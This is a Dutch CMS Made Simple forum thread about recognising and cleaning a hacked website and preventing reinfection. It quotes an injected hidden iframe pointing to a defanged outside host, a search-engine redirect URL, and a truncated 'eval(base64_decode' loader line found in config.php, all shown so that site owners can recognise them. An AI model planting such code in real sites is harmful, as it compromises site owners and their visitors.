• twitter image
  • facebook image
  • youtube image
  • linkedin image
Language: CMS Made Simple Czech CMS Made Simple France CMS Made Simple Hungary CMS Made Simple Russia CMS Made Simple Netherlands

All times are UTC




Post new topic Reply to topic  [ 8 posts ] 
Author Message
 Post subject: Wat stappen om een gehackte website te redden
PostPosted: Fri Jul 09, 2010 2:07 pm 
Offline
Dev Team Member
Dev Team Member
User avatar

Joined: Wed Apr 23, 2008 7:53 am
Posts: 7586
Location: The Netherlands
De website doet raar, geeft witte schermen, vreemde foutmeldingen in de browser, virusscanners geven meldingen bij een bezoek aan je website... Allemaal mogelijke tekenen voor een (ftp) gehackte website  :(

Kijk je in de broncode van de CMS bestanden, dan zie je vaak vreemde code tussen de normale code staan. Bijvoorbeeld in de root index.php:

Code:
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
   echo "< html>< head><title>Maintenance</title></head>< body>< iframe src="http;//abcde,ru:8080/index.php" width=157 height=142 style="visibility: hidden">< /iframe><p>Site down for maintenance.</p>< /body>< /html>";
   exit;
}

Voor de duidelijkheid het stuk tussen de iframe tags hoort daar niet te staan!
Het zet een, voor het oog niet zichtbaar iframe op je website. Maar de zoekmachines zien hem wel, bijvoorbeeld een manier om meer verwijzingen naar een site te krijgen en een hogere PageRank te genereren. Of het wordt gebruikt om malware of spam te verzenden, enz. enz.

Ergens op jouw server staan één of meerdere scripts (PHP-bestandjes) die de iFrames in jouw CMSMS bestanden zet.
Bekijk maar eens wat bestanden op de server, let hierbij op de laatste wijzigingsdatum. Over het algemeen zullen de bestanden dezelfde datum hebben: datum installatie of datum upgrade.
Veel van de dummy index.html files blijken vaak gewijzigd.

Raadpleeg in ieder geval de provider, zij kunnen (mogelijk) preventieve acties ondernemen.

Wijzig FTP-inloggegevens met sterkte wachtwoorden, bijv. "fhSDt34&FGyQ" of iets dergelijks, maar zeker niet zoiets als "henk01".
Voor de zekerheid kun je ook altijd de Admin inloggegevens nog even wijzigen. Al zal dat waarschijnlijk niet nodig zijn.

Door het maken van een back-up op een PC met een goed Internet Security pakket zou je deze niet-CMSMS bestanden wel kunnen vinden en verwijderen.
Maar het vinden van alle aangepaste/beschadigde bestanden is ondoenlijk...
Een CMSMS pakket bestaat uit duizenden bestanden.

Heb een aantal van deze acties op het forum bij de hand gehad.
De conclusie hier was dat er eigenlijk maar twee opties zijn.

1. Terugzetten van een back-up set die niet gehackt is, maar hierbij is het probleem: hoe weet je dit zeker? Heb een site gezien die al jaren geplaagd werd met dit soort zaken, stiekem zat er toch nog ergens een fout bestandje verstopt...

2. Met een schone lei beginnen...
- Zorg voor een goede back-up van de huidige bestanden en database!
- Maak een kopie van de Systeem Informatie voor een overzicht van de geïnstalleerde modules.
- Verwijder alle bestanden van de server, maar laat de database gewoon bestaan!
- Installeer een nieuwe CMSMS versie (die ook geïnstalleerd was) mét de nog bestaande database!
Maar let goed op wat je doet tijdens het installeren, kies NIET voor het aanmaken van tabellen en standaard inhoud in de database in stap 5. Anders wordt alles overschreven.
Let goed op wat je doet...
- Download en unzip de gebruikte modules naar de eigen pc, en upload deze daarna via FTP terug op de webserver.

Na het nieuw aanmaken van het CMS, kun je alle afbeeldingen e.d. terugplaatsen.
Doe dit handmatig en eigenlijk stuk voor stuk. Volledige mappen terugzetten heeft als risico dat er nog een fout bestandje in kan zitten en dan ben je weer terug bij af...

Alle bestanden zijn nu nieuw en de site kan weer zonder enige risico op gehackte files verder draaien.  :)


Hoe kun je een gehackte website voorkomen?

100% Garantie krijgt niemand, maar je kunt wel je best doen...

- Goede, betrouwbare host. Goedkoop kan wel eens duurkoop zijn.
- Sterke FTP loginnaam en wachtwoord (Tip: http://howsecureismypassword.net/)
- Zorg voor een up-to-date virusscanner op je eigen PC. Een virus kan vanuit je PC meeliften als je bestanden upload.
- Regelmatig back-ups van de website maken. Door het maken van deze back-up scant de virusscanner de bestanden op de server en zal een eventuele hack snel worden gedetecteerd en de schade minimaal blijven.
- Gebruik de laatste versies van CMS Made Simple en de modules. Upgraden dus!

Succes,

Rolf

_________________
Image

Did my post help you solving a problem at your (customers) website and it saved you many hours of work? Great!! Consider buying me a cup of coffee in return! [ Click here ]



Last edited by Rolf on Sun Jul 11, 2010 7:14 pm, edited 1 time in total.

Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Thu Aug 19, 2010 11:29 pm 
Offline
Forum Members
Forum Members

Joined: Fri Jun 18, 2010 10:02 am
Posts: 14
Location: Enschede, The Netherlands
Wat betreft filezilla en winscp:

Gebruik voor ftp alleen winscp. Filezilla slaat namelijk de paswords in plaintekst op. Er zijn trojans die deze verzamelen en uitlezen.

Beter is het om winscp te gebruiken met een master password wat de ftp passwords weer versleuteld.  8)
En zoals Arnoud al aangaf, alleen (indien mogelijk) uploaden via sftp. ;)


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Mon Oct 04, 2010 7:30 am 
Offline
Power Poster
Power Poster

Joined: Mon May 11, 2009 4:35 pm
Posts: 472
Een website van een klant van me is zojuist ook gehacked, alleen enkel via google...

De URL direct intypen werkt gewoon, maar via google zoeken en dan op de link klikken zorgt voor een redirect richting
Code:
p3p0.com/?said=3333g&q=[naamwebsite]
..

Checksum biedt geen oplossing, want ik heb sinds de installatie een hoop gewijzigd. Heb de lib dir geheel vervangen en ook alles files in de root.

Via ftp zie ik geen bestanden die pas gewijzigd zijn oid.


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Mon Oct 04, 2010 7:36 am 
Offline
Dev Team Member
Dev Team Member
User avatar

Joined: Wed Apr 23, 2008 7:53 am
Posts: 7586
Location: The Netherlands
@ brentnl
Welke versie cms gebruik je op deze website?
Heb je een link naar de site?

Grt. Rolf

_________________
Image

Did my post help you solving a problem at your (customers) website and it saved you many hours of work? Great!! Consider buying me a cup of coffee in return! [ Click here ]



Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Mon Oct 04, 2010 7:40 am 
Offline
Power Poster
Power Poster

Joined: Mon May 11, 2009 4:35 pm
Posts: 472
Rolf wrote:
@ brentnl
Welke versie cms gebruik je op deze website?
Heb je een link naar de site?

Grt. Rolf



CMS 1.8.1 , URL via DM.


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Mon Oct 04, 2010 7:46 am 
Offline
Power Poster
Power Poster

Joined: Mon May 11, 2009 4:35 pm
Posts: 472
het zat toch in config.php, dat was ook de enigste file die ik niet compleet had vernieuwd, maar enkel had doorgekeken. Blijkbaar niet goed genoeg, want er stond een regel in, in de trend van:

Code:
eval(base64_decode("lange string....


het is nu opgelost, nu maar even een nieuw FTP wachtwoord aan vragen..


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Mon Oct 04, 2010 10:04 am 
Offline
Dev Team Member
Dev Team Member
User avatar

Joined: Wed Apr 23, 2008 7:53 am
Posts: 7586
Location: The Netherlands
brentnl wrote:
het zat toch in config.php, dat was ook de enigste file die ik niet compleet had vernieuwd, maar enkel had doorgekeken. Blijkbaar niet goed genoeg, want er stond een regel in, in de trend van:

Code:
eval(base64_decode("lange string....


het is nu opgelost, nu maar even een nieuw FTP wachtwoord aan vragen..

Vraag blijft natuurlijk wel hoe kan iets, of iemand de config.php ongestraft wijzigen?
Was het bestand niet schrijfbeveiligd? (CHMOD444)
Heeft iemand anders toegang gehad via ftp?
Of staat er nog steeds een niet-cmsms-script op de server, en wijzigt deze de bestanden...

Niet om je bang te maken, maar wel om je bewust te maken van wat de oorzaken kunnen zijn...
Heb websites gezien die iedere keer weer werden gehackt, het bleek naderhand dat ze nog steeds waren gehackt. Jaren lang hebben er bestandjes op de server gestaan die de bestanden besmetten...

Grt. Rolf  ;)

_________________
Image

Did my post help you solving a problem at your (customers) website and it saved you many hours of work? Great!! Consider buying me a cup of coffee in return! [ Click here ]



Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Wat stappen om een gehackte website te redden
PostPosted: Mon Oct 04, 2010 10:17 am 
Offline
Power Poster
Power Poster

Joined: Mon May 11, 2009 4:35 pm
Posts: 472
Rolf wrote:
Niet om je bang te maken, maar wel om je bewust te maken van wat de oorzaken kunnen zijn...
Heb websites gezien die iedere keer weer werden gehackt, het bleek naderhand dat ze nog steeds waren gehackt. Jaren lang hebben er bestandjes op de server gestaan die de bestanden besmetten...

Grt. Rolf  ;)


Hier ben ik me van bewust ;) Nu heb ik net een nieuw ftp wachtwoord aangevraagd, config.php stond al op 444, op 777 gezet, aangepast en opgeschoond, weer op 444 gezet, en hierna weer het ftp wachtwoord veranderd. hoop dat het nu schoon blijft, heb de meeste bestanden van CMSMS vervangen door de originele files, dus hoop dat het nu rustig blijft..

wel een sneaky hack trouwens, enkel via zoekmachines redirecten.. het was puur toeval dat ik die website van een klant via google nu nog benaderde.


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 8 posts ] 

All times are UTC


Who is online

Users browsing this forum: No registered users


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
A2 Hosting